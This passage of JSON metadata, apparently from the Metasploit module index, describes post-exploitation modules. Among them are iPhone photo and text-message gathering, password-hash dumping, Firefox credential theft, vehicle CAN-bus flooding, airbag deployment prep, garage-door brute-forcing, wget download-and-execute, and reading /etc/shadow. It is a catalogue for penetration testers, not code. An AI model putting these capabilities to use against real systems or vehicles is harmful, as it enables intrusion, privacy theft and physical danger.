"android/manage/remove_lock_root", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - 
"needs_cleanup": null, - "actions": [] - }, - "post_apple_ios/gather/ios_image_gather": { - "name": "iOS Image Gatherer", - "fullname": "post/apple_ios/gather/ios_image_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shelby Pace" - ], - "description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.", - "references": [], - "platform": "Apple_iOS", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:31:19 +0000", - "path": "/modules/post/apple_ios/gather/ios_image_gather.rb", - "is_install_path": true, - "ref_name": "apple_ios/gather/ios_image_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_apple_ios/gather/ios_text_gather": { - "name": "iOS Text Gatherer", - "fullname": "post/apple_ios/gather/ios_text_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shelby Pace" - ], - "description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.", - "references": [], - "platform": "Apple_iOS", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:31:19 +0000", - "path": "/modules/post/apple_ios/gather/ios_text_gather.rb", - "is_install_path": true, - "ref_name": "apple_ios/gather/ios_text_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_bsd/gather/hashdump": { - "name": "BSD Dump 
Password Hashes", - "fullname": "post/bsd/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "Post module to dump the password hashes for all users on a BSD system.", - "references": [], - "platform": "BSD", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:09:41 +0000", - "path": "/modules/post/bsd/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "bsd/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/cookies": { - "name": "Firefox Gather Cookies from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/cookies", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-26", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows collection of cookies from a Firefox Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/cookies.rb", - "is_install_path": true, - "ref_name": "firefox/gather/cookies", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/history": { - "name": "Firefox Gather History from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/history", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-11", - "type": "post", - "author": [ - 
"joev " - ], - "description": "This module allows collection of the entire browser history from a Firefox\n Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/history.rb", - "is_install_path": true, - "ref_name": "firefox/gather/history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/passwords": { - "name": "Firefox Gather Passwords from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/passwords", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-11", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows collection of passwords from a Firefox Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/passwords.rb", - "is_install_path": true, - "ref_name": "firefox/gather/passwords", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/xss": { - "name": "Firefox XSS", - "fullname": "post/firefox/gather/xss", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. 
It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.", - "references": [], - "platform": "Firefox", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/firefox/gather/xss.rb", - "is_install_path": true, - "ref_name": "firefox/gather/xss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/manage/webcam_chat": { - "name": "Firefox Webcam Chat on Privileged JavaScript Shell", - "fullname": "post/firefox/manage/webcam_chat", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-13", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows streaming a webcam from a privileged Firefox JavaScript shell.", - "references": [ - "URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 12:21:55 +0000", - "path": "/modules/post/firefox/manage/webcam_chat.rb", - "is_install_path": true, - "ref_name": "firefox/manage/webcam_chat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/can_flood": { - "name": "CAN Flood", - "fullname": "post/hardware/automotive/can_flood", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Pietro Biondi" - ], - "description": 
"This module floods a CAN interface with supplied frames.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/can_flood.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/can_flood", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/canprobe": { - "name": "Module to Probe Different Data Points in a CAN Packet", - "fullname": "post/hardware/automotive/canprobe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). 
Does not check for responses and is\n basically a simple blind fuzzer.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/canprobe.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/canprobe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/diagnostic_state": { - "name": "Diagnostic State", - "fullname": "post/hardware/automotive/diagnostic_state", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/diagnostic_state.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/diagnostic_state", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/ecu_hard_reset": { - "name": "ECU Hard Reset", - "fullname": "post/hardware/automotive/ecu_hard_reset", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module performs hard reset in the ECU Reset Service 
Identifier (0x11).", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/ecu_hard_reset.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/ecu_hard_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/getvinfo": { - "name": "Get the Vehicle Information Such as the VIN from the Target Module", - "fullname": "post/hardware/automotive/getvinfo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "This module queries DTCs, some common engine info, and vehicle information.\n\n It returns such things as engine speed, coolant temp, Diagnostic Trouble\n Codes, as well as all info stored by Mode $09 Vehicle Info, VIN, etc.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/getvinfo.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/getvinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/identifymodules": { - "name": "Scan CAN Bus for Diagnostic Modules", - "fullname": "post/hardware/automotive/identifymodules", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - 
"author": [ - "Craig Smith" - ], - "description": "Scan the CAN bus for any modules that can respond to UDS DSC queries.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/identifymodules.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/identifymodules", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/malibu_overheat": { - "name": "Sample Module to Flood Temp Gauge on 2006 Malibu", - "fullname": "post/hardware/automotive/malibu_overheat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Simple sample temp flood for the 2006 Malibu.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/malibu_overheat.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/malibu_overheat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/mazda_ic_mover": { - "name": "Mazda 2 Instrument Cluster Accelorometer Mover", - "fullname": "post/hardware/automotive/mazda_ic_mover", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module 
moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/mazda_ic_mover.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/mazda_ic_mover", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/pdt": { - "name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)", - "fullname": "post/hardware/automotive/pdt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Johannes Braun", - "Juergen Duerrwang", - "Craig Smith" - ], - "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. 
(ISO 26021)", - "references": [ - "CVE-2017-14937", - "URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/pdt.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/pdt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/rftransceiver/rfpwnon": { - "name": "Brute Force AM/OOK (ie: Garage Doors)", - "fullname": "post/hardware/rftransceiver/rfpwnon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Corey Harding", - "Craig Smith" - ], - "description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. 
This is a port of the rfpwnon tool by Corey Harding.", - "references": [ - "URL-https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", - "is_install_path": true, - "ref_name": "hardware/rftransceiver/rfpwnon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/rftransceiver/transmitter": { - "name": "RF Transceiver Transmitter", - "fullname": "post/hardware/rftransceiver/transmitter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.", - "references": [ - "URL-https://github.com/AndrewMohawk/RfCatHelpers" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/rftransceiver/transmitter.rb", - "is_install_path": true, - "ref_name": "hardware/rftransceiver/transmitter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_hardware/zigbee/zstumbler": { - "name": "Sends Beacons to Scan for Active ZigBee Networks", - "fullname": "post/hardware/zigbee/zstumbler", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Send beacon signals to the broadcast address while channel hopping.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 20:12:59 +0000", - "path": "/modules/post/hardware/zigbee/zstumbler.rb", - "is_install_path": true, - "ref_name": "hardware/zigbee/zstumbler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/enum_connections": { - "name": "BusyBox Enumerate Connections", - "fullname": "post/linux/busybox/enum_connections", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. 
It will\n enumerate the connections established with the router or device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/enum_connections.rb", - "is_install_path": true, - "ref_name": "linux/busybox/enum_connections", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/enum_hosts": { - "name": "BusyBox Enumerate Host Names", - "fullname": "post/linux/busybox/enum_hosts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/enum_hosts.rb", - "is_install_path": true, - "ref_name": "linux/busybox/enum_hosts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/jailbreak": { - "name": "BusyBox Jailbreak ", - "fullname": "post/linux/busybox/jailbreak", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). 
It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/jailbreak.rb", - "is_install_path": true, - "ref_name": "linux/busybox/jailbreak", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/ping_net": { - "name": "BusyBox Ping Network Enumeration", - "fullname": "post/linux/busybox/ping_net", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/ping_net.rb", - "is_install_path": true, - "ref_name": "linux/busybox/ping_net", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/set_dmz": { - "name": "BusyBox DMZ Configuration", - "fullname": "post/linux/busybox/set_dmz", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. 
It allows to manage\n traffic forwarding to a target host through the BusyBox device.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/set_dmz.rb", - "is_install_path": true, - "ref_name": "linux/busybox/set_dmz", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/set_dns": { - "name": "BusyBox DNS Configuration", - "fullname": "post/linux/busybox/set_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/set_dns.rb", - "is_install_path": true, - "ref_name": "linux/busybox/set_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/smb_share_root": { - "name": "BusyBox SMB Sharing", - "fullname": "post/linux/busybox/smb_share_root", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. 
It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/smb_share_root.rb", - "is_install_path": true, - "ref_name": "linux/busybox/smb_share_root", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/wget_exec": { - "name": "BusyBox Download and Execute", - "fullname": "post/linux/busybox/wget_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/wget_exec.rb", - "is_install_path": true, - "ref_name": "linux/busybox/wget_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/dos/xen_420_dos": { - "name": "Linux DoS Xen 4.2.0 2012-5525", - "fullname": "post/linux/dos/xen_420_dos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Christoph Sendner ", - "Aleksandar Milenkoski " - ], - "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. 
Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.", - "references": [ - "CVE-2012-5525" - ], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/dos/xen_420_dos.rb", - "is_install_path": true, - "ref_name": "linux/dos/xen_420_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ansible": { - "name": "Ansible Config Gather", - "fullname": "post/linux/gather/ansible", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module will grab ansible information including hosts, ping status, and the configuration file.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/ansible.rb", - "is_install_path": true, - "ref_name": "linux/gather/ansible", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ansible_playbook_error_message_file_reader": { - "name": "Ansible Playbook Error Message File Reader", - "fullname": "post/linux/gather/ansible_playbook_error_message_file_reader", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "rioasmara" - ], - "description": "This module will read the first line of a file based on an 
error message from ansible-playbook with sudo privileges.\n ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line\n where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read\n /etc/shadow to obtain root's hash.", - "references": [ - "URL-https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb", - "is_install_path": true, - "ref_name": "linux/gather/ansible_playbook_error_message_file_reader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/apache_nifi_credentials": { - "name": "Apache NiFi Credentials Gather", - "fullname": "post/linux/gather/apache_nifi_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "Topaco" - ], - "description": "This module will grab Apache NiFi credentials from various files on Linux.", - "references": [ - "URL-https://stackoverflow.com/questions/77391210/python-vs-ruby-aes-pbkdf2", - "URL-https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#nifi_sensitive_props_key" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/apache_nifi_credentials.rb", - "is_install_path": true, - "ref_name": "linux/gather/apache_nifi_credentials", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/checkcontainer": { - "name": "Linux Gather Container Detection", - "fullname": "post/linux/gather/checkcontainer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "James Otten " - ], - "description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, WSL, LXC, Podman and systemd nspawn.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-04-26 21:58:43 +0000", - "path": "/modules/post/linux/gather/checkcontainer.rb", - "is_install_path": true, - "ref_name": "linux/gather/checkcontainer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/checkvm": { - "name": "Linux Gather Virtual Environment Detection", - "fullname": "post/linux/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
